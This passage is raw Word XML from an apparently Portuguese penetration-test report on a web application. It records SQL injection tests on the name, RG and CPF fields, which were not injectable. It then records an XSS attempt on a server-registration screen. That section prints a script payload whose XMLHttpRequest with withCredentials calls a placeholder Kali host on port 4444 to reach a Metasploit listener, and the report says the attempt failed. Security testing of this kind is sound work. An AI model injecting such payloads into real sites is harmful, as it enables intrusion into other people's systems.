          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” e “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cpf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” não são injetáveis à SQL conforme mostram as Figuras 25, 26 e 27.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573A1E5B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35040" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5684F2E4" wp14:editId="4566F51C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>320040</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>205105</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5265420" cy="4012565"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21535"/>
                <wp:lineTo x="21491" y="21535"/>
                <wp:lineTo x="21491" y="0"/>
                <wp:lineTo x="0" y="0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B6CF0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D61CAC" wp14:editId="4616C2BC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>300990</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1280795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3714750" cy="14287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9D87AB" id="Retângulo 14" o:spid="_x0000_s1026" style="position:absolute;margin-left:23.7pt;margin-top:-100.85pt;width:292.5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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 25 - Resultado teste de injeção de SQL no campo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Nome</w:t>
      </w:r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2A7F11E6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7DE6ECE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396E60" wp14:editId="204C4F0A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>186690</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1320165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3714750" cy="142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DBCDB6" id="Retângulo 15" o:spid="_x0000_s1026" style="position:absolute;margin-left:14.7pt;margin-top:-103.95pt;width:292.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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="004D4181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736064" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A80F758" wp14:editId="309DB41A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>139065</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="3986530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight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181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 26 - Resultado teste de injeção de SQL no campo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181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Pr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4DD543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3FB51EA" w14:textId="77777777" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4C5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1307B6" wp14:editId="4E1BA8C8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>43815</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2935605</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3714750" cy="142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6B7FFF" id="Retângulo 16" o:spid="_x0000_s1026" style="position:absolute;margin-left:3.45pt;margin-top:231.15pt;width:292.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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r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26EE6E" wp14:editId="6E95A968">
            <wp:extent cx="5400040" cy="4028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7165" w14:textId="77777777" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4C5F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Figura 27 -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Resultado teste de injeção de SQL no campo </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CPF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31008838" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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6EB80F21" w14:textId="77777777" w:rsidR="00F86B59" w:rsidRPr="004D4181" w:rsidRDefault="00F86B59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26296006" w14:textId="77777777" w:rsidR="00F86B59" w:rsidRPr="004D4181" w:rsidRDefault="00F86B59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1C55838C" w14:textId="0FAF1836" w:rsidR="00F86B59" w:rsidRPr="004D4181" w:rsidRDefault="00F86B59" w:rsidP="00F86B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>4.3.7 Iteração 07</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A462A3" w14:textId="77777777" w:rsidR="00F86B59" w:rsidRPr="004D4181" w:rsidRDefault="00F86B59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7C768BCE" w14:textId="231D224B" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00FF0B7E" w:rsidP="00201E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4.3.7.1. Explorar</w:t>
      </w:r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 XSS – Tela Cadastro Servidor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADE5844" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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Tarefa realizada dia </w:t>
      </w:r>
      <w:r w:rsidR="0033639F" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00E52417" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/05/16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EED2169" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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: 1 hora.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A27AAF7" w14:textId="77777777" w:rsidR="00751591" w:rsidRPr="004D4181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ED675E8" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr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Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04763D9F" w14:textId="77777777" w:rsidR="00760D9A" w:rsidRPr="004D4181" w:rsidRDefault="00760D9A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Com base no relatório de execução obtido no teste da seção </w:t>
      </w:r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4.3.4.1, sabe-se que os navegadores </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Iceweasel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 e Firefox, através do filtro CORS, bloqueiam requisições que usam </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D418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726A573" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00760D9A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Dessa forma, será utilizado o campo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“</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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”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, da tela Cadastro Servidor, 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para tentar incluir um script malicioso que consiga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ignorar o filtro CORS e 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realiz</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e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uma chamada a um </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mestasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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para executar um ataque usando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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="008C6DC7"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30A5F875" w14:textId="77777777" w:rsidR="001B2A0B" w:rsidRPr="004D4181" w:rsidRDefault="001B2A0B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A396583" w14:textId="77777777" w:rsidR="00772F19" w:rsidRPr="004D4181" w:rsidRDefault="00772F19" w:rsidP="0043259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6F83798" w14:textId="77777777" w:rsidR="00772F19" w:rsidRPr="004D4181" w:rsidRDefault="00772F19" w:rsidP="0043259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B79965C" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="0048383A" w:rsidP="0043259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4D41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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="328A46F3" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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Para </w:t>
      </w:r>
      <w:r w:rsidR="00760D9A" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ignorar</w:t>
      </w:r>
      <w:r w:rsidR="00BE0837" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o filtro CORS</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> do navegador </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> necessário que sejam incluídas algumas credenciais no cabeçalho da requisição. O script abaixo simula uma </w:t>
      </w:r>
      <w:r w:rsidR="00BE0837" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>essão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de requisição credenciada por meio do atributo “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181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Pr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181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7DD0B81B" w14:textId="77777777" w:rsidR="00E52417" w:rsidRPr="004D4181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B33F039" w14:textId="77777777" w:rsidR="00881DA5" w:rsidRPr="004D4181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e inicia uma chamada Ajax  do</w:t>
      </w:r>
      <w:r w:rsidR="00EC0987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tipo GET para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IP_do</w:t>
      </w:r>
      <w:r w:rsidR="00546C53" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_kali_linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00546C53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181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>na porta 4444 de forma assíncrona. Porém, aqui é utilizado o atributo “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181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Pr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para burlar o filtro de CORS do navegador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2293A3D5" w14:textId="77777777" w:rsidR="00881DA5" w:rsidRPr="004D4181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00F627" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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lt;</w:t>
      </w:r>
      <w:proofErr w:type="gram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script</w:t>
      </w:r>
      <w:proofErr w:type="gram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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EFEC7D" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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r = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spell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); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F506BB2" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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open</w:t>
      </w:r>
      <w:proofErr w:type="spell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"</w:t>
      </w:r>
      <w:proofErr w:type="spell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GET",’http</w:t>
      </w:r>
      <w:proofErr w:type="spell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://IP_do</w:t>
      </w:r>
      <w:r w:rsidR="00546C53"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_kali_linux</w:t>
      </w:r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:4444’,false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B408844" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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</w:t>
      </w:r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1E7FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>withCredentials</w:t>
      </w:r>
      <w:proofErr w:type="spell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 = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B89B9A" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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send</w:t>
      </w:r>
      <w:proofErr w:type="spell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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4636495F" w14:textId="77777777" w:rsidR="000F06E4" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="00A80565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</w:pPr>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r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/</w:t>
      </w:r>
      <w:r w:rsidR="008719F1"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script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA9A70B" w14:textId="77777777" w:rsidR="00A80565" w:rsidRPr="004D4181" w:rsidRDefault="00A80565" w:rsidP="00A80565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</w:pPr>
    </w:p>
    <w:p w14:paraId="267A0932" w14:textId="77777777" w:rsidR="00EC0987" w:rsidRPr="004D4181" w:rsidRDefault="000F06E4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32BF7F7C" w14:textId="77777777" w:rsidR="00EC0987" w:rsidRPr="004D4181" w:rsidRDefault="00EC0987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a máquina que hospeda o sistema não permita que a conexão seja aberta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778A73FD" w14:textId="77777777" w:rsidR="000F06E4" w:rsidRPr="004D4181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</w:pPr>
      <w:r w:rsidRPr="004D4181"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  <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159096BE" w14:textId="77777777" w:rsidR="00EC0987" w:rsidRPr="004D4181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66F3A4CD" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. O comando </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008719F1" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>withCredentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008719F1" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontra-se depreciado e a conexão não ocorreu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C064C01" w14:textId="77777777" w:rsidR="00EC0987" w:rsidRPr="004D4181" w:rsidRDefault="00EC0987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Não foi possível realizar o teste com êxito. Pois conforme mostra a </w:t>
      </w:r>
      <w:r w:rsidR="00657669" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 28, o comando </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>withCredentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>foi depreciado pelo navegador e a conexão não ocorreu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089E7BB0" w14:textId="77777777" w:rsidR="00E77F75" w:rsidRPr="004D4181" w:rsidRDefault="00A8056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5104" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6BC94DBC" wp14:editId="24B81611">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>91440</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>200660</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="649605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight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BC0B1" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00EC0987" w:rsidP="00A80565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Figura 28</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Console do navegador indicando a </w:t>
      </w:r>
      <w:r w:rsidR="00751591" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>depreciação</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> do atributo </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008719F1" w:rsidRPr="004D4181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="008719F1" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00166FEA" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1C1127" w14:textId="77777777" w:rsidR="00751591" w:rsidRPr="004D4181" w:rsidRDefault="00751591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2CAF09F" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="0048383A" w:rsidP="00A8056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4D41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4D4181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14:paraId="3E7DA302" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008719F1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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Para </w:t>
      </w:r>
      <w:r w:rsidR="00790D68" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ignorar</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o filtro CORS, deve ser </w:t>
      </w:r>
      <w:r w:rsidR="00A06B72" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>adicionada ao cabeçalho da requisição uma instrução que simule uma assinatura válida para o navegador</w:t>
      </w:r>
      <w:r w:rsidR="00790D68" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Para esse fim, foi utilizad</w:t>
      </w:r>
      <w:r w:rsidR="00790D68" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
